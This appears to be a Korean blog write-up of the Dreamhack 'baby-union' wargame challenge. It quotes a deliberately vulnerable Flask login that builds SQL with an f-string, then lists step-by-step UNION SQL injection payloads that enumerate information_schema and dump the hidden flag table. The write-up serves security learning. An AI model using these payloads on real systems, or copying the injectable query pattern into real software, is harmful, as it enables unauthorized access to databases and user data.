[Dreamhack] Level 1: baby-union

1. 문제 

https://dreamhack.io/wargame/challenges/984

baby-union

 

2. 해결 과정

(1) 문제 페이지 확인 

 

(2) 코드 확인 

- app.py 

입력값에 대한 필터링이 없다. 

import os
from flask import Flask, request, render_template
from flask_mysqldb import MySQL

app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'secret_db')
mysql = MySQL(app)

@app.route("/", methods = ["GET", "POST"])
def index():

    if request.method == "POST":
        uid = request.form.get('uid', '')
        upw = request.form.get('upw', '')
        if uid and upw:
            cur = mysql.connection.cursor()
            cur.execute(f"SELECT * FROM users WHERE uid='{uid}' and upw='{upw}';")
            data = cur.fetchall()
            if data:
                return render_template("user.html", data=data)

            else: return render_template("index.html", data="Wrong!")

        return render_template("index.html", data="Fill the input box", pre=1)
    return render_template("index.html")


if __name__ == '__main__':
    app.run(host='0.0.0.0')

 

- init.sql

사실 문제 페이지에서 admin으로 로그인하면 되는 줄 알고 코드를 안보고 문제 풀었다. 

그런데 뭔가 이상해서 확인해보니까 접근해야 하는 테이블은 users가 아닌 fake_table_name(가짜 이름) 이었다. 

해당 테이블에는 이름 모르는 칼럼들이 4개가 들어있고, 칼럼에 나눠져서 플래그값이 들어가 있다.  

따라서, 우리는 테이블이름과 칼럼값을 알아내야 한다. 

CREATE DATABASE secret_db;
GRANT ALL PRIVILEGES ON secret_db.* TO 'dbuser'@'localhost' IDENTIFIED BY 'dbpass';

USE `secret_db`;
CREATE TABLE users (
  idx int auto_increment primary key,
  uid varchar(128) not null,
  upw varchar(128) not null,
  descr varchar(128) not null
);

INSERT INTO users (uid, upw, descr) values ('admin', 'apple', 'For admin');
INSERT INTO users (uid, upw, descr) values ('guest', 'melon', 'For guest');
INSERT INTO users (uid, upw, descr) values ('banana', 'test', 'For banana');
FLUSH PRIVILEGES;

CREATE TABLE fake_table_name (
  idx int auto_increment primary key,
  fake_col1 varchar(128) not null,
  fake_col2 varchar(128) not null,
  fake_col3 varchar(128) not null,
  fake_col4 varchar(128) not null
);

INSERT INTO fake_table_name (fake_col1, fake_col2, fake_col3, fake_col4) values ('flag is ', 'DH{sam','ple','flag}');

 

UNION sql injection이 가능한지 먼저 확인해본 뒤 진행할 것이다. 필터링이 없었기 때문에 가능할 것이다. 

admin' UNION SELECT * FROM users # 을 입력해서 확인해보면, UNION에 대해서는 자유롭게 입력 가능한 것을 알 수 있다.

 

+) 까먹었는데 데이터베이스 버전 확인도 해야한다. 문제 다 풀고 생각나서 추가함

admin' union select version(),null,null,null # 

-> mariaDB이다. 

 

information_schema에서 테이블명을 조회해서 테이블의 정보를 알아낼 것이다. 

null값을 주는 이유는 칼럼의 개수를 맞춰서 쿼리문을 보내줘야 오류가 발생하지 않는다. 

admin' UNION SELECT TABLE_NAME, null, null, null FROM information_schema.TABLES;#

 

딱봐도 onlyflag라는 이름의 테이블이 의심스러워보인다. 

 

알아낸 테이블명을 이용해서  칼럼명을 알아낼 것이다. 

admin' UNION SELECT COLUMN_NAME, null, null, null FROM information_schema.columns WHERE table_name='onlyflag'#

 

sname, svalue, sflag, sclose 가 onlyfalg의 칼럼명이다. 

(나머지는 users)

 

칼럼의 값 조회하는 쿼리문 작성하면 flag가 성공적으로 출력된다. 

admin' UNION SELECT sname, svalue, sflag, sclose FROM onlyflag;#

 

 

줄 알았는데 아니었다. 

다시 확인해보면 칼럼 4개를 조회하도록 쿼리문을 작성하였는데 3개만 조회되었다. 즉 하나가 누락되었다. 

뭐가 누락되었는지 모르겠어서 그냥 하나씩 해보았다. 

admin' UNION SELECT svalue, sflag, sclose, NULL FROM onlyflag;#

 

위 쿼리 결과 새로운 플래그 값이 나와 중간에 껴주었다. ( 시작은 DH{ , 마지막은 }로 끝나끼 때문에 중간값이라는 것을 알수 있었다.)